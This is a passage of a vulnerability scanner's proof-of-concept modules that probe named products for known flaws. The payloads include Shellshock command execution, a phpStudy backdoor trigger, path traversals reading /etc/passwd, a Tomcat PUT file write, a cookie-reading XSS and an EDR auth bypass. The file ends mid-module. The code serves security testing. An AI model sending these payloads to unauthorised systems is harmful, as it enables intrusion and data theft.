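        if r is not None and r.status_code == 200 and b"<script>xxxxxx(31337)</script>" in r.content and b"nginx vhost traffic status monitor" in r.content:
            parser_ = response_parser(r)
            self.result.append({
                "name": self.name,
                "url": self.url,
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "request": parser_.getrequestraw(),
                    "response": parser_.getresponseraw()
                }
            })
--------------------------------------------------------------------------------
/myscan/pocs/perfolder/oracle/oracle_ebs-bispgrapgh-file-read_2020.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python3
# @Time : 2020/9/18
# @Author : caicai
# @File : oracle_ebs-bispgrapgh-file-read_2020.py

'''
keywords:
"E-Business Home Page"
'''
from myscan.lib.parse.response_parser import response_parser  # helper class with methods for working with a response
from myscan.lib.helper.request import request  # wrapper around requests.request; preferred because it also counts requests in redis
from myscan.config import scan_set
import re


class POC():
    """Oracle E-Business Suite bispgraph.jsp arbitrary file read.

    The ifl/ifn parameters name a directory and file name; the probe asks for
    /etc/passwd and reports when a passwd-style root entry comes back.
    """

    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # python dict of the captured request/response; see the dict example in docs/开发指南 (dev guide)
        self.url = workdata.get("data")  # directory URL under test; always ends with "/", e.g. https://www.baidu.com/home/
        self.result = []  # findings: dicts with name, url, level and detail keys; detail must itself be a dict (see the self.result.append below)
        self.name = "ebs-bispgrapgh-file-read"
        self.vulmsg = "no detail"
        self.level = 2  # 0:Low 1:Medium 2:High

    def verify(self):
        """Fetch OA_HTML/bispgraph.jsp with ifl=/etc/ ifn=passwd and look for the root entry."""
        # skip directories deeper than the max_dir depth configured in config.py
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        req = {
            "method": "GET",
            # the encoded CRLF + ".js" suffix in the path is part of the published
            # trigger — presumably to get past an extension-based filter; confirm
            "url": self.url + "OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/",
            "headers": self.dictdata.get("request").get("headers"),  # reuse the captured headers, mainly to keep cookies
            "timeout": 10,
            "verify": False,
        }
        r = request(**req)
        # match "root:x:0:0" or "root:*:0:0" so both shadow and non-shadow layouts count
        if r is not None and r.status_code == 200 and re.search(b"root:[x*]:0:0", r.content):
            parser_ = response_parser(r)
            self.result.append({
                "name": self.name,
                "url": self.url,
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "request": parser_.getrequestraw(),
                    "response": parser_.getresponseraw()
                }
            })

--------------------------------------------------------------------------------
/myscan/pocs/perfolder/phpstudy/__init__.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python3
# @Time : 2020/8/21
# @Author : caicai
# @File : __init__.py.py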
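--------------------------------------------------------------------------------
/myscan/pocs/perfolder/phpstudy/poc_phpstudy_backdoor_2019.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# @Time : 2020-02-17
# @Author : caicai
# @File : poc_phpstudy_backdoor_2019.py
import copy
from myscan.config import scan_set
from myscan.lib.helper.request import request
from myscan.lib.parse.response_parser import response_parser


class POC():
    """phpStudy 2016/2018 bundled php_xmlrpc.dll backdoor.

    The probe sends the two trigger headers of the known backdoor —
    Accept-Encoding "gzip,deflate" plus a base64-encoded PHP snippet in
    Accept-Charset — and looks for the snippet's output in the body.  The
    snippet is printf(md5(333)); so this executes PHP on the target, but only
    prints a constant digest.
    """

    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # python dict of the captured request/response; see the dict example in docs/开发指南 (dev guide)
        self.url = workdata.get("data")  # directory URL under test; always ends with "/", e.g. https://www.baidu.com/home/
        self.result = []  # findings: dicts with name, url, level and detail keys; detail must itself be a dict (see the self.result.append below)
        self.name = "phpstudy backdoor"
        self.vulmsg = '''Affected Version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4"
vuln_url: "php_xmlrpc.dll"'''
        self.level = 2  # 0:Low 1:Medium 2:High

    def verify(self):
        """GET the directory with the backdoor trigger headers and check for the md5 digest."""
        # skip directories deeper than the max_dir depth configured in config.py
        # (default 2, the same as every other POC in this tree; this file used to default to 1)
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return

        # Work on a copy so the shared captured headers are not mutated; tolerate
        # a capture without a header dict instead of failing on deepcopy(None)[...].
        request_headers = self.dictdata.get("request").get("headers") or {}
        request_headers_forpayload = copy.deepcopy(request_headers)
        request_headers_forpayload["Accept-Encoding"] = "gzip,deflate"
        request_headers_forpayload["Accept-Charset"] = "cHJpbnRmKG1kNSgzMzMpKTs="  # base64("printf(md5(333));")
        req = {
            "method": "GET",
            "url": self.url,
            "headers": request_headers_forpayload,  # captured headers (cookies etc.) plus the trigger headers
            "timeout": 10,
            "verify": False,
        }

        r = request(**req)
        # 310dcbbf4cce62f762a2aaa148d556bd is md5("333"); it only shows up if the payload ran
        if r and b"310dcbbf4cce62f762a2aaa148d556bd" in r.content:
            parse_ = response_parser(r)
            self.result.append({
                "name": self.name,
                "url": self.url,
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "request": parse_.getrequestraw(),
                    "response": parse_.getresponseraw()
                }
            })

--------------------------------------------------------------------------------
/myscan/pocs/perfolder/poc_user-agent-shell-shock_2018.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python3
# @Time : 2020/9/18
# @Author : caicai
# @File : poc_user-agent-shell-shock_2018.py

'''
Unverified: not yet reproduced against a live target.
'''
from myscan.lib.parse.response_parser import response_parser  # helper class with methods for working with a response
from myscan.lib.helper.request import request  # wrapper around requests.request; preferred because it also counts requests in redis
from myscan.config import scan_set
import re

class POC():
    """Shellshock (CVE-2014-6271) through the User-Agent of a CGI script.

    NOTE: this probe executes a command on the target (cat /etc/passwd).  The
    command is read-only, but it is still remote command execution; keep this
    POC out of scans where that is not authorised.
    """

    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # python dict of the captured request/response; see the dict example in docs/开发指南 (dev guide)
        self.url = workdata.get("data")  # directory URL under test; always ends with "/", e.g. https://www.baidu.com/home/
        self.result = []  # findings: dicts with name, url, level and detail keys; detail must itself be a dict (see the self.result.append below)
        self.name = "user-agent-shell-shock"
        self.vulmsg = "no detail"
        self.level = 2  # 0:Low 1:Medium 2:High

    def verify(self):
        """Send the Bash function-import payload in User-Agent to cgi-bin/status and look for /etc/passwd."""
        # skip directories deeper than the max_dir depth configured in config.py
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        # Bash only imports a function from an environment variable whose value
        # starts with "() {".  The previous payload wrapped the whole value in
        # literal double quotes, so HTTP_USER_AGENT began with '"' and a
        # vulnerable bash never parsed it.  The two "echo" calls end the CGI
        # response headers so the command output lands in the body.
        payload = "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"
        req = {
            "method": "GET",
            "url": self.url + "cgi-bin/status",
            "headers": {"User-Agent": payload},
            "timeout": 10,
            "allow_redirects": False,
            "verify": False,
        }
        r = request(**req)
        # match "root:x:0:0" or "root:*:0:0"
        if r is not None and r.status_code == 200 and re.search(b"root:[x*]:0:0", r.content):
            parser_ = response_parser(r)
            self.result.append({
                "name": self.name,
                "url": self.url,
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "request": parser_.getrequestraw(),
                    "response": parser_.getresponseraw()
                }
            })
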
-------------------------------------------------------------------------------- /myscan/pocs/perfolder/private/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/11/25 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/pulsesecure/poc_pulsesecure_sslvpn_cve-2019-11510_2019.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/11/3 3 | # @Author : caicai 4 | # @File : poc_pulsesecure_sslvpn_cve-2019-11510_2019.py 5 | ''' 6 | fofa: 7 | app="PulseSecure-SSL-VPN" 8 | ''' 9 | 10 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 11 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 12 | from myscan.config import scan_set 13 | import re 14 | 15 | class POC(): 16 | def __init__(self, workdata): 17 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 18 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 19 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 20 | self.name = "pulsesecure_sslvpn_cve-2019-11510" 21 | self.vulmsg = "google it " 22 | self.level = 3 # 0:Low 1:Medium 2:High 23 | 24 | def verify(self): 25 | 26 | if self.dictdata.get("url").get("protocol") != "https": 27 | return 28 | # 根据config.py 配置的深度,限定一下目录深度 29 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 30 | return 31 | 32 | req = { 33 | "method": "GET", 34 | "url": self.url + "dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/", 35 | "timeout": 10, 36 | "allow_redirects": False, 37 | "verify": False, 38 | } 39 | r = request(**req) 40 | if r != None and r.status_code == 
200 and re.search(b"root:[x*]:0", r.content): 41 | parser_ = response_parser(r) 42 | self.result.append({ 43 | "name": self.name, 44 | "url": self.url, 45 | "level": self.level, # 0:Low 1:Medium 2:High 46 | "detail": { 47 | "vulmsg": self.vulmsg, 48 | "request": parser_.getrequestraw(), 49 | "response": parser_.getresponseraw() 50 | } 51 | }) 52 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/qnap/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/rails/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/sangfor/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/sangfor/poc_sangfor_edr_unauth_2020.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : __template.py 5 | 6 | # 此脚本为编写perfloder的poc模板,编写poc时复制一份此模版为pocname即可,用户可在verify方法下添加自己代码 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = 
workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "sangfor edr unauth" 18 | self.vulmsg = "no detail " 19 | self.level = 2 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | req = { 26 | "method": "GET", 27 | "url": self.url + "ui/login.php?user=admin", 28 | "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers 29 | "timeout": 10, 30 | "allow_redirects": False, 31 | "verify": False, 32 | } 33 | r = request(**req) 34 | if r is not None and r.status_code==302 and "index.php" in r.headers.get("Location","") and b"SANGFOR\xe7\xbb\x88\xe7\xab\xaf\xe6\xa3\x80\xe6\xb5\x8b\xe5\x93\x8d\xe5\xba\x94\xe5\xb9\xb3\xe5\x8f\xb0" in r.content: 35 | parser_ = response_parser(r) 36 | self.result.append({ 37 | "name": self.name, 38 | "url": req["url"], 39 | "level": self.level, # 0:Low 1:Medium 2:High 40 | "detail": { 41 | "vulmsg": self.vulmsg, 42 | "request": parser_.getrequestraw(), 43 | "response": parser_.getresponseraw() 44 | } 45 | }) 46 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/sap/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/sap/poc_sap_cve-2017-12637_2017.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/11/24 3 | # @Author : caicai 4 | # @File : poc_sap_cve-2017-12637_2017.py 5 | 6 | 7 | 
from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "sap_cve-2017-12637" 18 | self.vulmsg = "no detail" 19 | self.level = 3 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | req = { 26 | "method": "GET", 27 | "url": self.url + "scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/..", 28 | "timeout": 10, 29 | "allow_redirects": False, 30 | "verify": False, 31 | } 32 | r = request(**req) 33 | if r is not None and r.status_code == 200 and b"WEB-INF" in r.content and b"META-INF" in r.content: 34 | parser_ = response_parser(r) 35 | self.result.append({ 36 | "name": self.name, 37 | "url": self.url, 38 | "level": self.level, # 0:Low 1:Medium 2:High 39 | "detail": { 40 | "vulmsg": self.vulmsg, 41 | "request": parser_.getrequestraw(), 42 | "response": parser_.getresponseraw() 43 | } 44 | }) 45 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/seeyon/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/solr/__init__.py: -------------------------------------------------------------------------------- 1 | # 
!/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/sonarqube/poc_sonarqube_api_access.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/10/29 3 | # @Author : caicai 4 | # @File : poc_sonarqube_api_access.py 5 | 6 | 7 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 8 | from myscan.config import scan_set 9 | from myscan.lib.parse.response_parser import response_parser 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "sonarqube_api_access" 18 | self.vulmsg = "no detail" 19 | self.level = 2 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | 26 | req = { 27 | "method": "GET", 28 | "url": self.url + "api/settings/values", 29 | "timeout": 10, 30 | "verify": False, 31 | "allow_redirects": False 32 | } 33 | r = request(**req) 34 | if r is not None and r.status_code == 200 and "application/json" in r.headers.get("Content-Type","") and b'''sonar.type''' in r.content: 35 | parser_ = response_parser(r) 36 | self.result.append({ 37 | "name": self.name, 38 | "url": parser_.geturl(), 39 | "level": self.level, # 0:Low 1:Medium 2:High 40 | "detail": { 41 | "vulmsg": self.vulmsg, 42 | "request": parser_.getrequestraw(), 43 | "response": parser_.getresponseraw() 44 | } 45 | }) 46 | -------------------------------------------------------------------------------- 
/myscan/pocs/perfolder/spark/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/spring/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/spring/poc_spring_xss_2020.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/9/1 3 | # @Author : caicai 4 | # @File : poc_spring_xss_2020.py 5 | 6 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 7 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 8 | from myscan.config import scan_set 9 | 10 | 11 | class POC(): 12 | def __init__(self, workdata): 13 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 14 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 15 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 16 | self.name = "springboot-xss" 17 | self.vulmsg = "unknown source. 
" 18 | self.level = 2 # 0:Low 1:Medium 2:High 19 | 20 | def verify(self): 21 | # 根据config.py 配置的深度,限定一下目录深度 22 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 23 | return 24 | req = { 25 | "method": "GET", 26 | "url": self.url + "jolokia/read%3Csvg%20onload=alert(document.cookie)%3E?mimeType=text/html", 27 | "headers": { 28 | "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169" 29 | }, 30 | "allow_redirects": False, 31 | "timeout": 10, 32 | "verify": False, 33 | } 34 | r = request(**req) 35 | if r != None and b"name 'read' exists" in r.content and "html" in r.headers.get("Content-Type",""): 36 | parser_ = response_parser(r) 37 | self.result.append({ 38 | "name": self.name, 39 | "url": parser_.geturl(), 40 | "level": self.level, # 0:Low 1:Medium 2:High 41 | "detail": { 42 | "vulmsg": self.vulmsg, 43 | "request": parser_.getrequestraw(), 44 | "response": parser_.getresponseraw() 45 | } 46 | }) 47 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/struts/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/supervisord/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/symantec/poc_symantec-messaging-gateway_lfi_2020.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/9/18 3 | # @Author : caicai 4 | # @File : poc_symantec-messaging-gateway_lfi_2020.py 5 | ''' 6 
| fofa 7 | app="Symantec-Messaging-Gateway 8 | ''' 9 | 10 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 11 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 12 | from myscan.config import scan_set 13 | 14 | 15 | class POC(): 16 | def __init__(self, workdata): 17 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 18 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 19 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 20 | self.name = "symantec-messaging-gateway_lfi" 21 | self.vulmsg = "Symantec Messaging Gateway <= 10.6.1 Directory Traversal" 22 | self.level = 2 # 0:Low 1:Medium 2:High 23 | 24 | def verify(self): 25 | # 根据config.py 配置的深度,限定一下目录深度 26 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 27 | return 28 | req = { 29 | "method": "GET", 30 | "url": self.url + "brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/", 31 | "timeout": 10, 32 | "verify": False, 33 | } 34 | r = request(**req) 35 | if r is not None and r.status_code == 200 and b"struts-default.xml" in r.content: 36 | parser_ = response_parser(r) 37 | self.result.append({ 38 | "name": self.name, 39 | "url": self.url, 40 | "level": self.level, # 0:Low 1:Medium 2:High 41 | "detail": { 42 | "vulmsg": self.vulmsg, 43 | "request": parser_.getrequestraw(), 44 | "response": parser_.getresponseraw() 45 | } 46 | }) 47 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/terramaster/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/12/25 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/thinkcmf/__init__.py: 
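--------------------------------------------------------------------------------
# !/usr/bin/env python3
# @Time : 2020/8/21
# @Author : caicai
# @File : __init__.py.py
--------------------------------------------------------------------------------
/myscan/pocs/perfolder/thinkcmf/poc_thinkcmf-lfi_2020.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python3
# @Time : 2020/9/18
# @Author : caicai
# @File : poc_thinkcmf-lfi_2020.py


from myscan.lib.parse.response_parser import response_parser  # helper class with methods for working with a response
from myscan.lib.helper.request import request  # wrapper around requests.request; preferred because it also counts requests in redis
from myscan.config import scan_set


class POC():
    """ThinkCMF local file inclusion via the templateFile parameter of a=display.

    The probe asks the display action to render README.md as a template and
    reports when the ThinkCMF README heading comes back.
    """

    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # python dict of the captured request/response; see the dict example in docs/开发指南 (dev guide)
        self.url = workdata.get("data")  # directory URL under test; always ends with "/", e.g. https://www.baidu.com/home/
        self.result = []  # findings: dicts with name, url, level and detail keys; detail must itself be a dict (see the self.result.append below)
        self.name = "thinkcmf lfi"
        self.vulmsg = "links: https://www.freebuf.com/vuls/217586.html"
        self.level = 2  # 0:Low 1:Medium 2:High

    def verify(self):
        """GET ?a=display&templateFile=README.md and check for the README contents."""
        # skip directories deeper than the max_dir depth configured in config.py
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        req = {
            "method": "GET",
            "url": self.url + "?a=display&templateFile=README.md",
            "headers": self.dictdata.get("request").get("headers"),  # reuse the captured headers, mainly to keep cookies
            "timeout": 10,
            "verify": False,
            "allow_redirects": False

        }
        r = request(**req)
        if r is not None and r.status_code == 200 and b"ThinkCMF" in r.content and b"## README" in r.content:
            parser_ = response_parser(r)
            self.result.append({
                "name": self.name,
                "url": parser_.geturl(),
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "request": parser_.getrequestraw(),
                    "response": parser_.getresponseraw()
                }
            })

--------------------------------------------------------------------------------
/myscan/pocs/perfolder/thinkphp/__init__.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python3
# @Time : 2020/8/21
# @Author : caicai
# @File : __init__.py.py
--------------------------------------------------------------------------------
/myscan/pocs/perfolder/tomcat/__init__.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python3
# @Time : 2020/8/21
# @Author : caicai
# @File : __init__.py.py
--------------------------------------------------------------------------------
/myscan/pocs/perfolder/tomcat/poc_tomcat_cve-2017-12615_2017.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# @Time : 2020-02-17
# @Author : caicai
# @File : poc_tomcat_cve-2017-12615_2017.py
import copy
from myscan.config import scan_set
from myscan.lib.helper.request import request
from myscan.lib.core.common import get_random_str


class POC():
    """Tomcat CVE-2017-12615: HTTP PUT enabled (readonly=false) lets clients write JSP files.

    This POC is intrusive: it creates a file on the target.  The content is an
    inert random string rather than a webshell, and the file is removed with a
    best-effort DELETE afterwards, but the path is still recorded in the finding
    so it can be cleaned up by hand if the DELETE is refused.
    """

    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # python dict of the captured request/response; see the dict example in docs/开发指南 (dev guide)
        self.url = workdata.get("data")  # directory URL under test; always ends with "/", e.g. https://www.baidu.com/home/
        self.result = []  # findings: dicts with name, url, level and detail keys; detail must itself be a dict (see the self.result.append below)
        self.name = "tomcat put rce"
        self.vulmsg = '''cve-2017-12615,Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件'''
        self.level = 3  # 0:Low 1:Medium 2:High

    def verify(self):
        """PUT a random <name>.jsp, read it back, record the finding, then try to DELETE it.

        The PUT targets "<name>.jsp/" (trailing slash) — the CVE-2017-12615
        trick that gets the request past the JSP handler so the default servlet
        writes <name>.jsp.  A 201 means the file was created; the follow-up GET
        confirms the content is served back.
        """
        # skip directories deeper than the max_dir depth configured in config.py
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return

        url = self.url + get_random_str(6).lower() + ".jsp"
        data = get_random_str(20)
        headers = self.dictdata.get("request").get("headers")  # reuse the captured headers, mainly to keep cookies
        req = {
            "method": "PUT",
            "url": url + "/",
            "headers": headers,
            "data": data,
            "timeout": 10,
            "verify": False,
        }

        r = request(**req)
        if r is None or r.status_code != 201:
            return  # nothing was written, nothing to clean up

        req2 = {
            "method": "GET",
            "url": url,
            "headers": headers,
            "timeout": 10,
            "verify": False,
        }
        r2 = request(**req2)
        if r2 and data in r2.text:
            self.result.append({
                "name": self.name,
                "url": self.url,
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "artifact": url,  # file written on the target; remove it manually if the DELETE below was refused
                }
            })

        # Best-effort cleanup of the probe file, using the same trailing-slash
        # trick as the PUT.  Its outcome does not change the finding.
        request(method="DELETE", url=url + "/", headers=headers, timeout=10, verify=False)

--------------------------------------------------------------------------------
/myscan/pocs/perfolder/tomcat/poc_tomcat_cve-2018-11759_2018.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# @Time : 2020-02-17
# @Author : caicai
# @File : poc_tomcat_cve-2018-11759_2018.py
from myscan.config import scan_set
from myscan.lib.helper.request import request



class POC():
    """Apache mod_jk CVE-2018-11759: "jkstatus;" (trailing semicolon) bypasses the jkstatus access restriction."""

    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # python dict of the captured request/response; see the dict example in docs/开发指南 (dev guide)
        self.url = workdata.get("data")  # directory URL under test; always ends with "/", e.g. https://www.baidu.com/home/
        self.result = []  # findings: dicts with name, url, level and detail keys; detail must itself be a dict (see the self.result.append below)
        self.name = "apache-mod jk 访问绕过"
        self.vulmsg = '''cve-2018-11759,refer:http://blog.nsfocus.net/apache-mod_jk/'''
        self.level = 2  # 0:Low 1:Medium 2:High

    def verify(self):
        """GET <dir>jkstatus; and report when the JK Status Manager page is served."""
        # skip directories deeper than the max_dir depth configured in config.py
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return

        req = {
            "method": "GET",
            "url": self.url + "jkstatus;",
            "headers": self.dictdata.get("request").get("headers"),  # reuse the captured headers, mainly to keep cookies
            "timeout": 10,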
"verify": False, 30 | } 31 | 32 | r = request(**req) 33 | if r != None and r.status_code == 200 and b"JK Status Manager" in r.content and b"Listing Load Balancing Worker" in r.content: 34 | self.result.append({ 35 | "name": self.name, 36 | "url": self.url + "jkstatus;", 37 | "level": self.level, # 0:Low 1:Medium 2:High 38 | "detail": { 39 | "vulmsg": self.vulmsg, 40 | } 41 | }) 42 | 43 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/tongda/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/weblogic/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/wordpress/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/wordpress/poc_wordpress-duplicator-path-traversal.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : poc_wordpress-duplicator-path-traversal.py 5 | 6 | ''' 7 | 未复现 8 | ''' 9 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 10 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 11 | from myscan.config import scan_set 12 | 13 | 14 | class POC(): 15 | def __init__(self, 
